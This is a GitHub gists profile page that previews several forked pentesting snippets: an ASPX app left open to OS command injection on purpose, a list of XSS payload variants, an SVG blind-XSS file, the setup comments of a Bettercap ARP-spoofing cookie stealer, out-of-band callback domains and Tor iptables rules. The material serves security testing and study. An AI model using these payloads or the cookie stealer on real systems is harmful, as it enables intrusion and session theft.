Skip to content

Instantly share code, notes, and snippets.

Avatar
Pwning

calfcrusher CalfCrusher

Pwning
View GitHub Profile
@CalfCrusher
CalfCrusher / kali-headless.md
Created Jan 27, 2023 — forked from xErik/kali-headless.md
Configuring Headless (no X, GUI) Kali, Running In VirtualBox
View kali-headless.md

Kali Headless Mode Configuration

Disabling the GUI/X/Head

systemctl set-default multi-user.target
systemctl get-default # shows new default mode
reboot
@CalfCrusher
CalfCrusher / ping.aspx
Created Jan 11, 2023 — forked from stasinopoulos/ping.aspx
Simple ASPX application (vulnerable to OS command injections)
View ping.aspx
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e){
}
string ExcuteCmd(string arg){
ProcessStartInfo psi = new ProcessStartInfo();
View gist:55e1505e027b48dc5de41e9f65a8069b
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@CalfCrusher
CalfCrusher / xss-image.svg
Created Jan 10, 2023 — forked from rudSarkar/xss-image.svg
SVG Image XSS File
View xss-image.svg
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View Blind XSS in SVG FILE
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
@CalfCrusher
CalfCrusher / responder-n-cookies.js
Created Dec 11, 2022 — forked from leoloobeek/responder-n-cookies.js
Bettercap Responder injection and cookie stealer
View responder-n-cookies.js
// Code mashed together from here: https://github.com/bettercap/caplets/
// Intended to use with Bettercap v2: https://github.com/bettercap/bettercap
//
// net.probe on
// sleep 1
// net.probe off
// set arp.spoof.targets <TARGETS>
// set https.proxy.script /root/caplets/responder-n-cookies.js
// set http.proxy.script /root/caplets/responder-n-cookies.js
// https.proxy on
@CalfCrusher
CalfCrusher / curl.md
Created Nov 10, 2022 — forked from subfuzion/curl.md
curl POST examples
View curl.md

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

View Vagrant OSX Setup
Vagrant
Create and configure lightweight, reproducible, and portable development environments. Vagrant is an amazing tool for managing virtual machines via a simple to use command line interface.
Before you start
In order to simplify the installation process you should install homebrew-cask which provides a friendly homebrew-style CLI workflow for the administration of Mac applications distributed as binaries. Refer to this article in order to install homebrew-cask.
Install
Vagrant uses Virtualbox to manage the virtual dependencies. You can directly download virtualbox and install or use homebrew for it.
View Out of band interaction domains
interact.sh
oast.pro
oast.live
oast.site
oast.online
oast.fun
oast.me
burpcollaborator.net
oastify.com
canarytokens.com
@CalfCrusher
CalfCrusher / route-traffic-through-tor-iptables.md
Created Oct 25, 2022 — forked from jkullick/route-traffic-through-tor-iptables.md
Route all Traffic through Tor for specific User on Linux with IPTables
View route-traffic-through-tor-iptables.md
iptables -A OUTPUT -p icmp -j REJECT
iptables -t nat -A OUTPUT ! -o lo -p tcp -m owner --uid-owner $USER -m tcp -j REDIRECT --to-ports 9040
iptables -t nat -A OUTPUT ! -o lo -p udp -m owner --uid-owner $USER -m udp --dport 53 -j REDIRECT --to-ports 53
iptables -t filter -A OUTPUT -p tcp -m owner --uid-owner $USER -m tcp --dport 9040 -j ACCEPT
iptables -t filter -A OUTPUT -p udp -m owner --uid-owner $USER -m udp --dport 53 -j ACCEPT
iptables -t filter -A OUTPUT ! -o lo -m owner --uid-owner $USER -j DROP